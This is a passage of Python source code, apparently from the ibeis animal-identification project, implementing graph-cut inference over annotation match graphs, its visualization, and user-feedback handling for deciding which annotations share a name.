idx1 = vt.find_elbow_point(curve)
idx2 = vt.find_elbow_point(curve[idx1:]) + idx1
thresh = curve[idx2]
else:
raise ValueError('method = %r' % (method,))
return thresh
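# Hypothetical usage sketch (not part of the original module): pick a cut
# threshold from a sorted curve of edge weights, either as the mean or at the
# elbow of the curve (the latter relies on vt.find_elbow_point, as above).
#
#     curve = sorted([0.05, 0.1, 0.15, 0.7, 0.8, 0.9])
#     thresh = estimate_threshold(curve, method='mean')   # ~0.45
#     thresh = estimate_threshold(curve, method='elbow')  # weight at the elbow index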
@six.add_metaclass(ut.ReloadingMetaclass)
class InfrModel(ut.NiceRepr):
"""
Wrapper around graphcut algorithms
"""
def __init__(model, graph):
#def __init__(model, n_nodes, edges, edge_weights=None, n_labels=None,
model.graph = graph
model._update_state()
def _update_state(model):
import networkx as nx
name_label_key = 'name_label'
weight_key = CUT_WEIGHT_KEY
# Get nx graph properties
external_nodes = sorted(list(model.graph.nodes()))
external_edges = list(model.graph.edges())
edge2_weights = nx.get_edge_attrs(model.graph, weight_key)
node2_labeling = nx.get_node_attrs(model.graph, name_label_key)
edge_weights = ut.dict_take(edge2_weights, external_edges, 0)
external_labeling = ut.take(node2_labeling, external_nodes)
# Map to internal ids for pygco
internal_nodes = ut.rebase_labels(external_nodes)
extern2_intern = dict(zip(external_nodes, internal_nodes))
internal_edges = ut.unflat_take(extern2_intern, external_edges)
internal_labeling = ut.rebase_labels(external_labeling)
n_nodes = len(internal_nodes)
# Model state
model.n_nodes = n_nodes
model.extern2_intern = extern2_intern
model.intern2_extern = ut.invert_dict(extern2_intern)
model.edges = internal_edges
model.edge_weights = edge_weights
# Model parameters
model.labeling = np.zeros(model.n_nodes, dtype=np.int32)
model._update_labels(labeling=internal_labeling)
model._update_weights()
def __nice__(self):
return 'n_nodes=%r, n_labels=%r' % (self.n_nodes, self.n_labels)
#return '(n_nodes=%r, n_labels=%r, nrg=%r)' % (self.n_nodes,
#self.n_labels, self.total_energy)
def _update_labels(model, n_labels=None, unaries=None, labeling=None):
if labeling is not None:
n_labels_ = max(labeling) + 1
assert n_labels is None or n_labels == n_labels_
n_labels = n_labels_
if n_labels is None:
n_labels = 2
if unaries is None:
unaries = np.zeros((model.n_nodes, n_labels), dtype=np.int32)
# Update internals
model.pairwise_potts = -1 * np.eye(n_labels, dtype=np.int32)
model.n_labels = n_labels
model.unaries = unaries
if model.labeling.max() >= n_labels:
model.labeling = np.zeros(model.n_nodes, dtype=np.int32)
def _update_weights(model, thresh=None):
int_factor = 1E2
edge_weights = np.array(model.edge_weights)
if thresh is None:
thresh = model._estimate_threshold()
else:
if isinstance(thresh, six.string_types):
thresh = model._estimate_threshold(method=thresh)
#np.mean(edge_weights)
if True:
# Center and scale weights between -1 and 1
centered = (edge_weights - thresh)
centered[centered < 0] = (centered[centered < 0] / thresh)
centered[centered > 0] = (centered[centered > 0] / (1 - thresh))
newprob = (centered + 1) / 2
newprob[np.isnan(newprob)] = .5
# Apply logit rule
# prevent infinity
#pad = 1 / (int_factor * 2)
pad = 1E6
perbprob = (newprob * (1.0 - pad * 2)) + pad
weights = vt.logit(perbprob)
else:
weights = (edge_weights - thresh)
# Conv
weights[np.isnan(edge_weights)] = 0
weights = (weights * int_factor).astype(np.int32)
edges_ = np.round(model.edges).astype(np.int32)
edges_ = vt.atleast_nd(edges_, 2)
edges_.shape = (edges_.shape[0], 2)
weighted_edges = np.vstack((edges_.T, weights)).T
weighted_edges = np.ascontiguousarray(weighted_edges)
weighted_edges = np.nan_to_num(weighted_edges)
# Remove edges with 0 weight as they have no influence
weighted_edges = weighted_edges.compress(weighted_edges.T[2] != 0, axis=0)
# Update internals
model.thresh = thresh
model.weighted_edges = weighted_edges
model.weights = weights
@property
def total_energy(model):
pairwise_potts = model.pairwise_potts
wedges = model.weighted_edges
unary_idxs = (model.labeling,)
pairwise_idxs = (model.labeling[wedges.T[0]],
model.labeling[wedges.T[1]])
_unary_energies = model.unaries[unary_idxs]
_potts_energies = pairwise_potts[pairwise_idxs]
unary_energy = _unary_energies.sum()
pairwise_energy = (wedges.T[2] * _potts_energies).sum()
total_energy = unary_energy + pairwise_energy
return total_energy
@property
def node_to_label(model):
# External nodes to label
nodes = ut.take(model.intern2_extern, range(model.n_nodes))
extern_node2_new_label = dict(zip(nodes, model.labeling))
return extern_node2_new_label
def _estimate_threshold(model, method=None, curve=None):
"""
import plottool as pt
idx3 = vt.find_elbow_point(curve[idx1:idx2 + 1]) + idx1
pt.plot(curve)
pt.plot(idx1, curve[idx1], 'bo')
pt.plot(idx2, curve[idx2], 'ro')
pt.plot(idx3, curve[idx3], 'go')
"""
if curve is None:
isvalid = ~np.isnan(model.edge_weights)
curve = sorted(ut.compress(model.edge_weights, isvalid))
thresh = estimate_threshold(curve, method)
#if len(curve) == 0:
# return 0
#if method is None:
# method = 'mean'
#if method == 'mean':
# thresh = np.mean(curve)
#elif method == 'elbow':
# idx1 = vt.find_elbow_point(curve)
# idx2 = vt.find_elbow_point(curve[idx1:]) + idx1
# thresh = curve[idx2]
#else:
# raise ValueError('method = %r' % (method,))
return thresh
def run_inference(model, thresh=None, n_labels=None, n_iter=5,
algorithm='expansion'):
import pygco
if n_labels is not None:
model._update_labels(n_labels)
if thresh is not None:
model._update_weights(thresh=thresh)
if model.n_labels <= 0:
raise ValueError('cannot run inference with zero labels')
if model.n_labels == 1:
labeling = np.zeros(model.n_nodes, dtype=np.int32)
else:
cutkw = dict(n_iter=n_iter, algorithm=algorithm)
if 0:
print(ut.code_repr(model.unaries, 'unaries'))
print(ut.code_repr(model.weighted_edges, 'weighted_edges'))
print(ut.code_repr(model.pairwise_potts, 'pairwise_potts'))
print(ut.code_repr(cutkw, 'cutkw'))
labeling = pygco.cut_from_graph(model.weighted_edges, model.unaries,
model.pairwise_potts, **cutkw)
model.labeling = labeling
#print('model.total_energy = %r' % (model.total_energy,))
return labeling
def run_inference2(model, min_labels=1, max_labels=10):
cut_params = ut.all_dict_combinations({
#'n_labels': list(range(min_labels, max_labels + 1)),
#'n_labels': list(range(min_labels, max_labels + 1)),
'n_labels': list(range(max_labels, max_labels + 1)),
})
cut_energies = []
cut_labeling = []
for params in cut_params:
model.run_inference(**params)
nrg = model.total_energy
#complexity = .1 * model.n_nodes * model.thresh * params['n_labels']
complexity = 0
nrg2 = nrg + complexity
print('used %d labels' % (len(set(model.labeling))),)
print('complexity = %r' % (complexity,))
print('nrg = %r' % (nrg,))
print('nrg + complexity = %r' % (nrg2,))
cut_energies.append(nrg2)
cut_labeling.append(model.labeling)
best_paramx = np.argmin(cut_energies)
print('best_paramx = %r' % (best_paramx,))
params = cut_params[best_paramx]
print('params = %r' % (params,))
labeling = cut_labeling[best_paramx]
model.labeling = labeling
#labeling = model.run_inference(**params)
return labeling, params
@staticmethod
def weights_as_matrix(weighted_edges):
n_labels = weighted_edges.T[0:2].max() + 1
mat = np.zeros((n_labels, n_labels))
flat_idxs = np.ravel_multi_index(weighted_edges.T[0:2], dims=(n_labels, n_labels))
assert ut.isunique(flat_idxs)
        mat.ravel()[flat_idxs] = weighted_edges.T[2]
        #mat[tuple(weighted_edges.T[0:2])] = weighted_edges.T[2]
        return mat
def get_cut_edges(model):
extern_uv_list = np.array(list(model.graph.edges()))
intern_uv_list = ut.unflat_take(model.extern2_intern, extern_uv_list)
intern_uv_list = np.array(intern_uv_list)
u_labels = model.labeling[intern_uv_list.T[0]]
v_labels = model.labeling[intern_uv_list.T[1]]
# Remove edges between all annotations with different labels
cut_edges = extern_uv_list[u_labels != v_labels]
cut_edges = [tuple(uv.tolist()) for uv in cut_edges]
return cut_edges
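# Hypothetical usage sketch (not part of the original module): InfrModel expects
# a networkx graph whose nodes carry 'name_label' attributes and whose edges
# carry CUT_WEIGHT_KEY ('cut_weight') attributes; run_inference requires pygco.
#
#     graph = nx.Graph([(1, 2), (2, 3)])
#     nx.set_node_attrs(graph, 'name_label', {1: 0, 2: 0, 3: 1})
#     nx.set_edge_attrs(graph, 'cut_weight', {(1, 2): 0.9, (2, 3): 0.1})
#     model = InfrModel(graph)
#     labeling = model.run_inference(thresh=0.5, n_labels=2)
#     cut_edges = model.get_cut_edges()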
@six.add_metaclass(ut.ReloadingMetaclass)
class AnnotInferenceVisualization(object):
""" contains plotting related code """
truth_colors = {
'match': pt.TRUE_GREEN,
#'match': pt.TRUE_BLUE,
'nomatch': pt.FALSE_RED,
'notcomp': pt.YELLOW,
'unreviewed': pt.UNKNOWN_PURP
}
def initialize_visual_node_attrs(infr, graph=None):
if infr.verbose:
print('[infr] initialize_visual_node_attrs')
import networkx as nx
#import plottool as pt
if graph is None:
graph = infr.graph
#node_to_aid = infr.node_to_aid
aid_to_node = infr.aid_to_node
#nx.get_node_attrs(graph, 'aid')
#nodes = list(graph.nodes())
aid_list = list(aid_to_node.keys())
annot_nodes = ut.take(aid_to_node, aid_list)
#aid_list = [node_to_aid.get(node, node) for node in nodes]
chip_width = 256
imgpath_list = infr.ibs.depc_annot.get('chips', aid_list, 'img',
config=dict(dim_size=chip_width),
read_extern=False)
nx.set_node_attrs(graph, 'framewidth', 3.0)
#nx.set_node_attrs(graph, 'framecolor', pt.DARK_BLUE)
nx.set_node_attrs(graph, 'shape', _dz(annot_nodes, ['rect']))
nx.set_node_attrs(graph, 'image', _dz(annot_nodes, imgpath_list))
def get_colored_edge_weights(infr, graph=None):
# Update color and linewidth based on scores/weight
if graph is None:
graph = infr.graph
edges = list(infr.graph.edges())
edge2_weight = nx.get_edge_attrs(infr.graph, CUT_WEIGHT_KEY)
#edges = list(edge2_weight.keys())
weights = np.array(ut.dict_take(edge2_weight, edges, np.nan))
nan_idxs = []
if len(weights) > 0:
# give nans threshold value
nan_idxs = np.where(np.isnan(weights))[0]
weights[nan_idxs] = infr.thresh
#weights = weights.compress(is_valid, axis=0)
#edges = ut.compress(edges, is_valid)
colors = infr.get_colored_weights(weights)
#print('!! weights = %r' % (len(weights),))
#print('!! edges = %r' % (len(edges),))
#print('!! colors = %r' % (len(colors),))
if len(nan_idxs) > 0:
import plottool as pt
for idx in nan_idxs:
colors[idx] = pt.GRAY
return edges, weights, colors
def get_colored_weights(infr, weights):
import plottool as pt
#pt.rrrr()
cmap_ = 'viridis'
cmap_ = 'plasma'
#cmap_ = pt.plt.get_cmap(cmap_)
weights[np.isnan(weights)] = infr.thresh
#colors = pt.scores_to_color(weights, cmap_=cmap_, logscale=True)
colors = pt.scores_to_color(weights, cmap_=cmap_, score_range=(0, 1),
logscale=False)
return colors
@property
def visual_edge_attrs(infr):
return ['implicit', 'style', 'tail_lp', 'taillabel', 'label', 'lp',
'headlabel', 'linestyle', 'color', 'stroke', 'lw', 'end_pt',
'start_pt', 'head_lp', 'alpha', 'ctrl_pts', 'pos', 'zorder']
@property
def visual_node_attrs(infr):
return ['color', 'framewidth', 'image', 'label',
'pos', 'shape', 'size', 'height', 'width', 'zorder']
def simplify_graph(infr, graph):
s = graph.copy()
for attr in infr.visual_edge_attrs:
ut.nx_delete_edge_attr(s, attr)
for attr in infr.visual_node_attrs:
ut.nx_delete_node_attr(s, attr)
return s
def update_visual_attrs(infr, graph=None, show_cuts=False,
show_reviewed_cuts=True, only_reviewed=False):
if infr.verbose:
print('[infr] update_visual_attrs')
#edge2_weight = nx.get_edge_attrs(infr.graph, 'score')
if graph is None:
# Hack for name_graph
graph = infr.graph
ut.nx_delete_edge_attr(graph, 'style')
ut.nx_delete_edge_attr(graph, 'implicit')
ut.nx_delete_edge_attr(graph, 'color')
ut.nx_delete_edge_attr(graph, 'lw')
ut.nx_delete_edge_attr(graph, 'stroke')
ut.nx_delete_edge_attr(graph, 'alpha')
ut.nx_delete_edge_attr(graph, 'linestyle')
ut.nx_delete_edge_attr(graph, 'label')
# Set annotation node labels
node_to_aid = nx.get_node_attrs(graph, 'aid')
node_to_nid = nx.get_node_attrs(graph, 'name_label')
annotnode_to_label = {
#node: '%d:aid=%r' % (node, aid)
node: 'aid=%r\nnid=%r' % (aid, node_to_nid[node])
for node, aid in node_to_aid.items()
}
nx.set_node_attributes(graph, 'label', annotnode_to_label)
# Color nodes by name label
ut.color_nodes(graph, labelattr='name_label')
reviewed_states = nx.get_edge_attrs(graph, 'reviewed_state')
SPLIT_MODE = True
if not SPLIT_MODE:
# Update color and linewidth based on scores/weight
edges, edge_weights, edge_colors = infr.get_colored_edge_weights(graph)
#nx.set_edge_attrs(graph, 'len', _dz(edges, [10]))
nx.set_edge_attrs(graph, 'color', _dz(edges, edge_colors))
minlw, maxlw = .5, 4
lw = ((maxlw - minlw) * edge_weights + minlw)
nx.set_edge_attrs(graph, 'lw', _dz(edges, lw))
            # Mark reviewed edges with a stroke
edge_to_stroke = {
edge: {'linewidth': 3, 'foreground': infr.truth_colors[state]}
for edge, state in reviewed_states.items()
}
nx.set_edge_attrs(graph, 'stroke', edge_to_stroke)
else:
            # Mark reviewed edges with a color
edge_to_color = {
edge: infr.truth_colors[state]
for edge, state in reviewed_states.items()
}
nx.set_edge_attrs(graph, 'color', edge_to_color)
# Mark edges that might be splits with strokes
possible_split_edges = infr.find_possible_binary_splits()
edge_to_stroke = {
edge: {'linewidth': 3, 'foreground': pt.ORANGE}
for edge in ut.unique(possible_split_edges)
}
nx.set_edge_attrs(graph, 'stroke', edge_to_stroke)
# Are cuts visible or invisible?
edge2_cut = nx.get_edge_attrs(graph, 'is_cut')
cut_edges = [edge for edge, cut in edge2_cut.items() if cut]
nx.set_edge_attrs(graph, 'implicit', _dz(cut_edges, [True]))
if infr.verbose:
print('show_cuts = %r' % (show_cuts,))
print('show_reviewed_cuts = %r' % (show_reviewed_cuts,))
nx.set_edge_attrs(graph, 'linestyle', _dz(cut_edges, ['dashed']))
# Non-matching edges should not impose a constraint on the graph layout
nonmatch_edges = {edge: state for edge, state in reviewed_states.items()
if state == 'nomatch'}
nx.set_edge_attrs(graph, 'implicit', _dz(nonmatch_edges, [True]))
if only_reviewed:
# only reviewed edges contribute
edges = list(graph.edges())
unreviewed_edges = ut.setdiff(edges, reviewed_states.keys())
nx.set_edge_attrs(graph, 'implicit', _dz(unreviewed_edges, [True]))
nx.set_edge_attrs(graph, 'style', _dz(unreviewed_edges, ['invis']))
if show_cuts or show_reviewed_cuts:
if not show_cuts:
nonfeedback_cuts = ut.setdiff(cut_edges, reviewed_states.keys())
nx.set_edge_attrs(graph, 'style', _dz(nonfeedback_cuts, ['invis']))
else:
nx.set_edge_attrs(graph, 'style', _dz(cut_edges, ['invis']))
# Make MST edge have more alpha
edge_to_ismst = nx.get_edge_attrs(graph, '_mst_edge')
mst_edges = [edge for edge, flag in edge_to_ismst.items() if flag]
nx.set_edge_attrs(graph, 'alpha', _dz(mst_edges, [.5]))
        nodes = list(graph.nodes())
        edges = list(graph.edges())
        nx.set_node_attributes(graph, 'zorder', _dz(nodes, [10]))
        nx.set_edge_attributes(graph, 'zorder', _dz(edges, [0]))
# update the positioning layout
layoutkw = dict(
prog='neato',
#defaultdist=100,
splines='spline',
sep=10 / 72,
#esep=10 / 72
)
pt.nx_agraph_layout(graph, inplace=True, **layoutkw)
def show_graph(infr, use_image=False, only_reviewed=False, show_cuts=False):
infr.update_visual_attrs(only_reviewed=only_reviewed, show_cuts=False)
graph = infr.graph
plotinfo = pt.show_nx(graph, layout='custom', as_directed=False,
modify_ax=False, use_image=use_image, verbose=0)
pt.zoom_factory()
pt.pan_factory(pt.gca())
# Draw a colorbar
xy = (1, infr.thresh)
xytext = (2.5, .3 if infr.thresh < .5 else .7)
_normal_ticks = np.linspace(0, 1, num=11)
_normal_scores = np.linspace(0, 1, num=500)
_normal_colors = infr.get_colored_weights(_normal_scores)
cb = pt.colorbar(_normal_scores, _normal_colors, lbl='weights',
ticklabels=_normal_ticks)
ta = cb.ax.annotate('threshold', xy=xy, xytext=xytext,
arrowprops=dict(
alpha=.5, fc="0.6",
connectionstyle="angle3,angleA=90,angleB=0"),)
#return cb, ta
plotinfo, ta, cb
#return plotinfo
@six.add_metaclass(ut.ReloadingMetaclass)
class AnnotInference(ut.NiceRepr, AnnotInferenceVisualization):
"""
Sandbox class for maintaining state of an identification
CommandLine:
python -m ibeis.viz.viz_graph2 make_qt_graph_interface --show --aids=1,2,3,4,5,6,7
Example:
>>> # ENABLE_DOCTEST
>>> from ibeis.algo.hots.graph_iden import * # NOQA
>>> infr = testdata_infr()
>>> result = ('infr = %s' % (infr,))
>>> print(result)
infr = <AnnotInference(nAids=6, nEdges=0)>
"""
truth_texts = {
0: 'nomatch',
1: 'match',
2: 'notcomp',
3: 'unreviewed',
}
def __init__(infr, ibs, aids, nids=None, autoinit=False, verbose=False):
infr.verbose = verbose
if infr.verbose:
print('[infr] __init__')
infr.ibs = ibs
infr.aids = aids
if nids is None:
nids = ibs.get_annot_nids(aids)
if ut.isscalar(nids):
nids = [nids] * len(aids)
infr.orig_name_labels = nids
#if current_nids is None:
# current_nids = nids
assert len(aids) == len(nids), 'must correspond'
#assert len(aids) == len(current_nids)
infr.graph = None
infr.user_feedback = ut.ddict(list)
infr.thresh = .5
infr.cm_list = None
infr.qreq_ = None
if autoinit:
infr.initialize_graph()
def augment_name_nodes(infr):
raise NotImplementedError('do not use')
# If we want to represent name nodes in the graph
name_graph = infr.graph.copy()
#infr.qreq_.dnid_list
#infr.qreq_.daid_list
daids = infr.qreq_.daids
dnids = infr.qreq_.get_qreq_annot_nids(daids)
unique_dnids = ut.unique(dnids)
dname_nodes = [('nid', nid) for nid in unique_dnids]
name_graph.add_nodes_from(dname_nodes)
nx.set_node_attributes(name_graph, 'nid', _dz(dname_nodes, unique_dnids))
node_to_nid = nx.get_node_attrs(name_graph, 'nid')
nid_to_node = ut.invert_dict(node_to_nid)
dannot_nodes = ut.take(infr.aid_to_node, daids)
dname_nodes = ut.take(nid_to_node, dnids)
name_graph.add_edges_from(zip(dannot_nodes, dname_nodes))
#graph = infr.graph
graph = name_graph
nx.set_node_attrs(name_graph, 'name_label', node_to_nid)
infr.initialize_visual_node_attrs(graph)
nx.set_node_attrs(graph, 'shape', _dz(dname_nodes, ['circle']))
infr.update_visual_attrs(graph=name_graph, show_cuts=False)
namenode_to_label = {
node: 'nid=%r' % (nid,)
for node, nid in node_to_nid.items()
}
nx.set_node_attributes(name_graph, 'label', namenode_to_label)
pt.show_nx(graph, layout='custom', as_directed=False, modify_ax=False,
use_image=False, verbose=0)
pt.zoom_factory()
pt.pan_factory(pt.gca())
#dannot_nodes = ut.take(infr.aid_to_node, dnids)
pass
@classmethod
def from_qreq_(cls, qreq_, cm_list):
raise NotImplementedError('do not use')
aids = ut.unique(ut.flatten([qreq_.qaids, qreq_.daids]))
nids = qreq_.get_qreq_annot_nids(aids)
ibs = qreq_.ibs
infr = cls(ibs, aids, nids, verbose=False)
infr.cm_list = cm_list
infr.qreq_ = qreq_
return infr
def __nice__(infr):
if infr.graph is None:
return 'nAids=%r, G=None' % (len(infr.aids))
else:
return 'nAids=%r, nEdges=%r' % (len(infr.aids),
infr.graph.number_of_edges())
def reset_feedback(infr):
""" Resets feedback edges to state of the SQL annotmatch table """
if infr.verbose:
print('[infr] reset_feedback')
infr.user_feedback = infr.read_user_feedback()
def remove_feedback(infr):
if infr.verbose:
print('[infr] remove_feedback')
infr.user_feedback = ut.ddict(list)
def connected_compoment_reviewed_subgraphs(infr):
"""
        Two kinds of edges are considered in connected component analysis: user
        reviewed edges, and algorithmically inferred edges. If an inference
        algorithm is not run, then user review is all that matters.
"""
graph = infr.graph
# Make a graph where connections do indicate same names
graph2 = graph.copy()
reviewed_states = nx.get_edge_attrs(graph, 'reviewed_state')
#edge_to_ismst = nx.get_edge_attrs(graph, '_mst_edge')
keep_edges = [key for key, val in reviewed_states.items() if val == 'match']
#keep_edges += list(edge_to_ismst.keys())
graph2.remove_edges_from(list(graph2.edges()))
graph2.add_edges_from(keep_edges)
ccs = list(nx.connected_components(graph2))
cc_subgraphs = [graph.subgraph(cc) for cc in ccs]
return cc_subgraphs
def connected_compoment_status(infr):
r"""
Args:
Returns:
tuple: (num_names, num_inconsistent)
CommandLine:
python -m ibeis.algo.hots.graph_iden connected_compoment_status --show
Example:
>>> # DISABLE_DOCTEST
>>> from ibeis.algo.hots.graph_iden import * # NOQA
>>> infr = testdata_infr('testdb1')
>>> infr.add_feedback(2, 3, 'nomatch')
>>> infr.add_feedback(5, 6, 'nomatch')
>>> infr.add_feedback(1, 2, 'match')
>>> infr.apply_feedback_edges()
>>> status = infr.connected_compoment_status()
>>> print(ut.repr3(status))
"""
cc_subgraphs = infr.connected_compoment_reviewed_subgraphs()
num_names_max = len(cc_subgraphs)
ccx_to_aids = {
ccx: list(nx.get_node_attrs(cc, 'aid').values())
for ccx, cc in enumerate(cc_subgraphs)
}
aid_to_ccx = {
aid: ccx for ccx, aids in ccx_to_aids.items() for aid in aids
}
all_reviewed_states = nx.get_edge_attrs(infr.graph, 'reviewed_state')
separated_ccxs = set([])
inconsistent_ccxs = set([])
for edge, state in all_reviewed_states.items():
if state == 'nomatch':
ccx1 = aid_to_ccx[edge[0]]
ccx2 = aid_to_ccx[edge[1]]
                # Determine the number of negative matches within a component
if ccx1 == ccx2:
inconsistent_ccxs.add(ccx1)
                # Determine the number of components that should not be joined
if ccx1 > ccx2:
ccx1, ccx2 = ccx2, ccx1
separated_ccxs.add((ccx1, ccx2))
def approx_min_num_components(nodes, negative_edges):
"""
            Find the minimum number of connected components possible.
            Each negative edge means that the two nodes must be separated.
            This code does not solve the problem exactly: the problem is
            NP-complete and reduces to minimum clique cover (MCC). This
            heuristic might only be an approximation.
>>> import networkx as nx
>>> nodes = [1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> edges = [(1, 2), (2, 3), (3, 1),
>>> (4, 5), (5, 6), (6, 4),
>>> (7, 8), (8, 9), (9, 7),
>>> (1, 4), (4, 7), (7, 1),
>>> ]
>>> g_pos = nx.Graph()
>>> g_pos.add_edges_from(edges)
>>> import plottool as pt
>>> pt.qt4ensure()
>>> g_neg = nx.complement(g_pos)
>>> pt.show_nx(g_neg)
>>> negative_edges = g_neg.edges()
>>> nodes = [1, 2, 3, 4, 5, 6, 7]
>>> negative_edges = [(1, 2), (2, 3), (4, 5)]
            >>> approx_min_num_components(nodes, negative_edges)
2
"""
num = 0
g_neg = nx.Graph()
g_neg.add_nodes_from(nodes)
g_neg.add_edges_from(negative_edges)
# Collapse all nodes with degree 0
deg0_nodes = [n for n, d in g_neg.degree_iter() if d == 0]
for u, v in ut.itertwo(deg0_nodes):
g_neg = nx.contracted_nodes(g_neg, v, u)
# Initialize unused nodes to be everything
unused = list(g_neg.nodes())
# complement of the graph contains all possible positive edges
g_pos = nx.complement(g_neg)
if False:
from networkx.algorithms.approximation import clique
maxiset, cliques = clique.clique_removal(g_pos)
num = len(cliques)
return num
# Iterate until we have used all nodes
while len(unused) > 0:
                # Seed a new "minimum component"
num += 1
# Grab a random unused node n1
#idx1 = np.random.randint(0, len(unused))
idx1 = 0
n1 = unused[idx1]
unused.remove(n1)
neigbs = list(g_pos.neighbors(n1))
neigbs = ut.isect(neigbs, unused)
while len(neigbs) > 0:
# Find node n2, that n1 could be connected to
#idx2 = np.random.randint(0, len(neigbs))
idx2 = 0
n2 = neigbs[idx2]
unused.remove(n2)
# Collapse negative information of n1 and n2
g_neg = nx.contracted_nodes(g_neg, n1, n2)
# Compute new possible positive edges
g_pos = nx.complement(g_neg)
# Iterate until n1 has no more possible connections
neigbs = list(g_pos.neighbors(n1))
neigbs = ut.isect(neigbs, unused)
print('num = %r' % (num,))
return num
num_names_min = approx_min_num_components(infr.aids, separated_ccxs)
# pass
#for count, subgraph in enumerate(cc_subgraphs):
# sub_reviewed_states = nx.get_edge_attrs(subgraph, 'reviewed_state')
# inconsistent_edges = [
# edge for edge, val in sub_reviewed_states.items()
# if val == 'nomatch'
# ]
# if len(inconsistent_edges) > 0:
# #print('Inconsistent')
# num_inconsistent += 1
status = dict(
num_names_max=num_names_max,
num_inconsistent=len(inconsistent_ccxs),
num_names_min=num_names_min,
)
return status
def connected_compoment_reviewed_relabel(infr):
if infr.verbose:
print('[infr] connected_compoment_reviewed_relabel')
cc_subgraphs = infr.connected_compoment_reviewed_subgraphs()
num_inconsistent = 0
num_names = len(cc_subgraphs)
for count, subgraph in enumerate(cc_subgraphs):
reviewed_states = nx.get_edge_attrs(subgraph, 'reviewed_state')
inconsistent_edges = [edge for edge, val in reviewed_states.items()
if val == 'nomatch']
if len(inconsistent_edges) > 0:
#print('Inconsistent')
num_inconsistent += 1
nx.set_node_attrs(infr.graph, 'name_label',
_dz(list(subgraph.nodes()), [count]))
# Check for consistency
return num_names, num_inconsistent
def read_user_feedback(infr):
"""
Loads feedback from annotmatch table
Example:
>>> # ENABLE_DOCTEST
>>> from ibeis.algo.hots.graph_iden import * # NOQA
>>> infr = testdata_infr('testdb1')
>>> user_feedback = infr.read_user_feedback()
>>> result =('user_feedback = %s' % (ut.repr2(user_feedback, nl=1),))
>>> print(result)
user_feedback = {
(2, 3): [{'p_match': 1.0, 'p_nomatch': 0.0, 'p_notcomp': 0.0}],
(5, 6): [{'p_match': 1.0, 'p_nomatch': 0.0, 'p_notcomp': 0.0}],
}
"""
if infr.verbose:
print('[infr] read_user_feedback')
ibs = infr.ibs
annots = ibs.annots(infr.aids)
am_rowids, aid_pairs = annots.get_am_rowids_and_pairs()
aids1 = ut.take_column(aid_pairs, 0)
aids2 = ut.take_column(aid_pairs, 1)
# Use tags to infer truth
props = ['SplitCase', 'JoinCase', 'Photobomb']
flags_list = ibs.get_annotmatch_prop(props, am_rowids)
is_split, is_merge, is_pb = flags_list
is_split = np.array(is_split).astype(np.bool)
is_merge = np.array(is_merge).astype(np.bool)
is_pb = np.array(is_pb).astype(np.bool)
# Use explicit truth state to mark truth
truth = np.array(ibs.get_annotmatch_truth(am_rowids))
        # Hack, if we didn't set it, it probably means it matched
need_truth = np.array(ut.flag_None_items(truth)).astype(np.bool)
need_aids1 = ut.compress(aids1, need_truth)
need_aids2 = ut.compress(aids2, need_truth)
needed_truth = ibs.get_aidpair_truths(need_aids1, need_aids2)
truth[need_truth] = needed_truth
# Add information from relevant tags
truth = np.array(truth, dtype=np.int)
truth[is_split] = ibs.const.TRUTH_NOT_MATCH
truth[is_pb] = ibs.const.TRUTH_NOT_MATCH
truth[is_merge] = ibs.const.TRUTH_MATCH
p_match = (truth == ibs.const.TRUTH_MATCH).astype(np.float)
p_nomatch = (truth == ibs.const.TRUTH_NOT_MATCH).astype(np.float)
p_notcomp = (truth == ibs.const.TRUTH_UNKNOWN).astype(np.float)
# CHANGE OF FORMAT
user_feedback = ut.ddict(list)
for count, (aid1, aid2) in enumerate(zip(aids1, aids2)):
edge = tuple(sorted([aid1, aid2]))
review = {
'p_match': p_match[count],
'p_nomatch': p_nomatch[count],
'p_notcomp': p_notcomp[count],
}
user_feedback[edge].append(review)
return user_feedback
#@staticmethod
def _pandas_feedback_format(infr, user_feedback):
import pandas as pd
aid_pairs = list(user_feedback.keys())
aids1 = ut.take_column(aid_pairs, 0)
aids2 = ut.take_column(aid_pairs, 1)
ibs = infr.ibs
am_rowids = ibs.get_annotmatch_rowid_from_undirected_superkey(aids1, aids2)
#am_rowids = np.array(ut.replace_nones(am_rowids, np.nan))
probs_ = list(user_feedback.values())
probs = ut.take_column(probs_, -1)
df = pd.DataFrame.from_dict(probs)
df['aid1'] = aids1
df['aid2'] = aids2
df['am_rowid'] = am_rowids
df.set_index('am_rowid')
df.index = pd.Index(am_rowids, name='am_rowid')
#df.index = pd.Index(aid_pairs, name=('aid1', 'aid2'))
return df
def initialize_graph(infr):
if infr.verbose:
print('[infr] initialize_graph')
#infr.graph = graph = nx.DiGraph()
infr.graph = graph = nx.Graph()
graph.add_nodes_from(infr.aids)
node_to_aid = {aid: aid for aid in infr.aids}
infr.node_to_aid = node_to_aid
node_to_nid = {aid: nid for aid, nid in
zip(infr.aids, infr.orig_name_labels)}
assert len(node_to_nid) == len(node_to_aid), '%r - %r' % (
len(node_to_nid), len(node_to_aid))
nx.set_node_attrs(graph, 'aid', node_to_aid)
nx.set_node_attrs(graph, 'name_label', node_to_nid)
nx.set_node_attrs(graph, 'orig_name_label', node_to_nid)
infr.aid_to_node = ut.invert_dict(infr.node_to_aid)
def match_residuals(infr):
""" Returns information about state change of annotmatches """
old_feedback = infr._pandas_feedback_format(infr.read_user_feedback())
new_feedback = infr._pandas_feedback_format(infr.user_feedback)
new_df, old_df = infr._make_residuals(old_feedback, new_feedback)
return new_df, old_df
@staticmethod
def _make_residuals(old_feedback, new_feedback):
"""
Example:
>>> # ENABLE_DOCTEST
>>> import pandas as pd
>>> old_data = [
>>> [1, 0, 0, 100, 101, 1000],
>>> [0, 1, 0, 101, 102, 1001],
>>> [0, 1, 0, 103, 104, 1003],
>>> [1, 0, 0, 101, 104, 1004],
>>> ]
>>> new_data = [
>>> [1, 0, 0, 101, 102, 1001],
>>> [0, 1, 0, 103, 104, 1002],
>>> [0, 1, 0, 101, 104, 1003],
>>> [1, 0, 0, 102, 103, None],
>>> [1, 0, 0, 100, 103, None],
>>> [0, 0, 1, 107, 109, None],
>>> ]
>>> columns = ['p_match', 'p_nomatch', 'p_noncomp', 'aid1', 'aid2', 'am_rowid']
>>> old_feedback = pd.DataFrame(old_data, columns=columns)
>>> new_feedback = pd.DataFrame(new_data, columns=columns)
>>> old_feedback.set_index('am_rowid', inplace=True, drop=False)
>>> new_feedback.set_index('am_rowid', inplace=True, drop=False)
>>> new_df, old_df = AnnotInference._make_residuals(old_feedback, new_feedback)
>>> # post
>>> is_add = np.isnan(new_df['am_rowid'].values)
>>> add_df = new_df.loc[is_add]
>>> add_ams = [2000, 2001, 2002]
